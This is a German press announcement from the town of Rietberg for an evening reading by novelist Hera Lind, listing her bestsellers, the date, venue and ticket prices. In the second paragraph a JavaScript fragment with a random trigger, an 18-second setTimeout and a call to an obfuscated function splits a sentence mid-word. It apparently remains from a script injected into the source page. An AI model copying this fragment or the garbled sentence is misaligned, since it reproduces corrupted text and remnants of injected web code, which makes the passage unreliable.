Hera Lind liest ihre schönsten Geschichten

Ganz ohne Buch und Lesebrille, dafür mit viel Charme und Humor präsentiert Hera Lind in Rietberg die schönsten Geschichten aus ihren beliebtesten und aktuellsten Romanen. Die gelernte Lehrerin und studierte Sängerin plaudert ganz unkompliziert über ihr Leben als Erfolgsautorin und gibt zwischendurch eine kleine Gesangseinlage. Unter dem Motto »Best of Bestsellers! Zwischen Superweib und Schleuderprogramm, Verwechseljahren und Kuckucksnest« spricht die Erfolgsautorin über ihre erfolgreichsten Bücher mit Schwerpunkt auf ihrem neuen Buch. Das alles gibt es auf Einladung von kulturig und der Stadtbibliothek Rietberg am Mittwoch, 5. September, in der Cultura zu erleben. Beginn ist um 20 Uhr.

Bekannt wurde die Autorin unter andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderem mit ihrem Roman »Die Champagner-Diät«, aber auch mit ihren bewegenden Tatsachenromanen wie »Kuckucksnest« und »Mein Mann, seine Frauen und ich« eroberte sie die Bestsellerlisten. Bekannt sind auch »Ein Mann für jede Tonart« und »Das Superweib«. Die Bücher von Hera Lind erreichten bis heute eine Gesamtauflage von 13 Millionen und wurden insgesamt in 17 Sprachen übersetzt. Die gebürtige Bielefelderin lebt inzwischen in Salzburg.

Karten gibt es ab sofort für 13,10 Euro an vielen bekannten Vorverkaufsstellen sowie in der Touristik-Information der Stadt Rietberg, Rathausstraße 38, Telefon (05244) 986-100, kulturig@stadt-rietberg.de, und im Internet www.kulturig.com, sowie für 15 Euro an der Abendkasse.

Quelle: Stadt Rietberg